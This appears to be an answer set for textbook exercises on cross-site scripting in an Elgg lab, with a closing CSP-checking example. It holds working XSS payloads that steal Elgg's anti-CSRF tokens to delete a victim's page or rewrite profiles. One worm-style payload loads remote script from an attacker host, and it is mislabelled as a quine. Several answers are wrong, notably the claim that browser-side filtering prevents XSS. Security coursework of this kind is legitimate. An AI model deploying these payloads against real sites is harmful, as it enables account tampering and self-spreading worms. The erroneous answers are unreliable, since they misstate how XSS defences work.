Web_XSS_ex

11.1. Using LiveHTTPHeader, we find out that the following GET request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).

http://www.example.com/delete.php?pageid=5
GET /delete.php?pageid=5
Host: www.example.com
...

Please write a malicious JavaScript program, which can delete a page owned by the victim if the program is injected into one of the victim’s pages from www.example.com.

<script type="text/javascript">
    window.onload = function () {
        var Ajax=null;
        // Same URL the page's own delete link uses; the browser attaches the
        // victim's session cookie to this same-origin request automatically.
        var sendurl="http://www.example.com/delete.php?pageid=5";
        Ajax=new XMLHttpRequest();
        Ajax.open("GET",sendurl,true);
        // Host is a forbidden request header for XMLHttpRequest; browsers ignore this call.
        Ajax.setRequestHeader("Host","www.example.com");
        Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        Ajax.send();
    }
</script>

11.2. Using LiveHTTPHeader, we find out that the following POST request is used to send an HTTP request to www.example.com to delete a page owned by a user (only the owner of a page can delete the page).

http://www.example.com/delete.php
POST /delete.php HTTP/1.1
Host: www.example.com
...
Content-Length: 8
pageid=5

Please write a malicious JavaScript program, which can delete a page owned by the victim if the program is injected into one of the victim’s pages from www.example.com.

<script type="text/javascript">
    window.onload = function () {
        // Elgg's anti-CSRF timestamp and token are exposed to page scripts,
        // so injected code can read them and include them in the POST body.
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content=ts+token+"&pageid=5";
        var samyGuid=47; //FILL IN
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=new XMLHttpRequest();
            var sendurl="http://www.example.com/delete.php";
            Ajax.open("POST",sendurl,true);
            // Host is a forbidden request header for XMLHttpRequest; browsers ignore this call.
            Ajax.setRequestHeader("Host","www.example.com");
            Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

11.3. In Listing C.2 of the book (C is the chapter number of the XSS chapter; its actual value depends on which version of the book you are using), we added a check before sending the Ajax request to modify Samy’s own profile. What is the main purpose of this check? If we do not add this check, can the attack be successful? How come we do not have such a check in the add-friend attack (Listing 10.1)?

Without this check, once Samy puts the attack code into his own profile, the modified content is displayed immediately, so the attack code in the page executes right away; it changes the content of Samy’s profile to “samy is my hero”, and the original attack code is overwritten.

11.4. To defeat XSS attacks, a developer decides to implement filtering on the browser side. Basically, the developer plans to add JavaScript code on each page, so before data are sent to the server, it filters out any JavaScript code contained inside the data. Let’s assume that the filtering logic can be made perfect. Can this approach prevent XSS attacks?

Yes. Since the key to an XSS attack is embedding malicious JavaScript code in the victim’s browser, preventing any JavaScript from being uploaded will undoubtedly also prevent any JavaScript from being downloaded.

11.5. What are the differences between XSS and CSRF attacks?

A CSRF attack originates from a page different from the target page, whereas an XSS attack originates from the same page. An XSS attack also involves injecting JavaScript code into the page.

11.6. Can the secret token countermeasure be used to defeat XSS attacks?

No, because the injected JavaScript can do anything the victim’s page can normally do, so it can easily access the secret token and send a request to the server.

11.7. Can the same-site cookie countermeasure for CSRF attacks be used to defeat XSS attacks?

No. An XSS attack takes place within the same site, so the server will not suspect anything.

11.8. To filter out JavaScript code from user input, can we just look for script tags, and remove them?

No. Script tags are not the only way to embed JavaScript; many attributes of HTML tags can also contain JavaScript code.

11.9. If you can modify browser’s behavior, what would you add to browser, so you can help reduce the risks of XSS attacks?

Encode all content sent from the page, to make sure that no code is transmitted to the server.

11.10. There are two typical ways for a program to produce a copy of itself. One way is to get a copy of itself from outside, such as from the underlying system (e.g., files, DOM nodes) and from the network. Another way is not to use any help from outside, but instead generate a copy of itself entirely from the code. There is a name for this approach: it is called a quine program, which, according to Wikipedia, “is a non-empty computer program which takes no input and produces a copy of its own source code as its only output. The standard terms for these programs in the computability theory and computer science literature are self-replicating programs, self-reproducing programs, and self-copying programs.” The self-replicating JavaScript program shown in Listing 10.3 is not a quine, because it uses document.getElementById() to take an input from the underlying system.
Please write a quine program, and put it in a user’s profile in Elgg. When anybody visits this profile, the code will be executed, and it prints out a copy of itself in an alert window. The Wikipedia site has examples of quine programs in a variety of programming languages.
If you really want to challenge yourself, please rewrite the code in Listing 10.3, so it is a quine program, and it can do what exactly the code in Listing 10.3 can do, i.e., adding a statement and a copy of the worm to the victim’s profile.

<script type="text/javascript">
    window.onload = function () {
        var userName=elgg.session.user.name;
        // Elgg's anti-CSRF timestamp and token are readable by page scripts.
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var sendurl="http://www.xsslabelgg.com/action/profile/edit";
        // The string literal is split with + so it stays on two lines legally.
        var desc="<p><b>been attacked!!!<\/b><\/p>"+
            "<script type=\"text\/javascript\" src=\"http:\/\/www.csrflabattacker.com\/task6.js\"><\/script>";
        var content="name="+userName+ts+token+"&description="+desc;
        var samyGuid=47; //FILL IN
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            // Host is a forbidden request header for XMLHttpRequest; browsers ignore this call.
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

11.11. The fundamental cause of XSS vulnerabilities is that HTML allows JavaScript code to be mixed with data. From the security perspective, mixing code with data is very dangerous. XSS gives us an example. Please provide two other examples that can be used to demonstrate that mixing code with data is bad for security.

Examples where mixing code with data is harmful to security:

Format string vulnerabilities and their exploitation.
Buffer overflow attacks.
Shellshock attacks.
SQL injection attacks.

11.12. Why is the CSP (Content Security Policy) effective in defeating the Cross-Site Scripting attack? What is the downside of this approach?

It tells the browser which sources can be trusted.

The cost of CSP is that it completely separates JavaScript code from HTML pages, which brings many inconveniences for developers.

11.13. Can CSP (Content Security Policy) be used to defeat CSRF attacks? Why or why not?

No. A CSRF request is issued from a malicious website, which has nothing to do with CSP.

11.14. The following PHP code returns a web page. It also sets the CSP (Content Security Policy) for the JavaScript code running inside the page. Which JavaScript code is allowed to execute inside this page?

<?php
$cspheader = "Content-Security-Policy:".
    "default-src 'self';".
    "script-src 'self' 'nonce-1rA2345' 'example.com'".
    "";
header($cspheader);
?>
<html>
    <script type="text/javascript" nonce="1rA2345">
        ... JavaScript Code ... ①
    </script>
    <script type="text/javascript" nonce="2rB3333">
        ... JavaScript Code ... ②
    </script>
    <script type="text/javascript">
        ... JavaScript Code ... ③
    </script>
    <script src="script.js"> </script> ④
    <script src="https://example.com/script2.js"> </script> ⑤
    <button onclick="alert('hello')">Click me</button> ⑥
</html>

①④⑤
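An added example (not from the page or the book) that models how a browser applies the script-src directive of question 11.14 to its six scripts, and so also shows the "which sources to trust" decision described in 11.12. It assumes the page origin is https://www.example.com (constructed) and writes the host source as example.com without quotes, since CSP host sources are unquoted and the answer key treats it as a host source.

```javascript
// Added example: a simplified model of the browser's script-src check.
// CSP string from the question (host source example.com written unquoted).
const CSP_HEADER = "default-src 'self'; script-src 'self' 'nonce-1rA2345' example.com";
const PAGE_ORIGIN = "https://www.example.com"; // constructed page origin

// Parse "name src src; name src" into { name: [sources] }.
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const parts = directive.trim().split(/\s+/).filter(Boolean);
    if (parts.length) policy[parts[0]] = parts.slice(1);
  }
  return policy;
}

// script: { inline: true, nonce?, handler? } or { src: "url" }.
function scriptAllowed(policy, pageOrigin, script) {
  const sources = policy["script-src"] || policy["default-src"] || [];
  if (script.inline) {
    // Inline code runs only with 'unsafe-inline' or a matching nonce;
    // an onclick= handler cannot carry a nonce, so it is always blocked here.
    if (sources.includes("'unsafe-inline'")) return true;
    return !script.handler && script.nonce !== undefined &&
      sources.includes(`'nonce-${script.nonce}'`);
  }
  const url = new URL(script.src, pageOrigin); // resolves a relative src
  return sources.some((s) => {
    if (s === "'self'") return url.origin === new URL(pageOrigin).origin;
    // Bare host source: match the host name (scheme/port/path simplified).
    return !s.startsWith("'") && url.hostname === s;
  });
}

// The six numbered scripts of question 11.14, returning the allowed ones.
function evaluateQuestion() {
  const policy = parseCsp(CSP_HEADER);
  const scripts = {
    1: { inline: true, nonce: "1rA2345" },
    2: { inline: true, nonce: "2rB3333" },
    3: { inline: true },
    4: { src: "script.js" },
    5: { src: "https://example.com/script2.js" },
    6: { inline: true, handler: true },
  };
  return Object.keys(scripts)
    .filter((n) => scriptAllowed(policy, PAGE_ORIGIN, scripts[n]))
    .map(Number); // [1, 4, 5]
}
```

Script ③ and handler ⑥ are blocked even though they sit in the page itself, which is the inconvenience mentioned in 11.12: every inline script must either be moved to a separately served file or be given the server's nonce.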
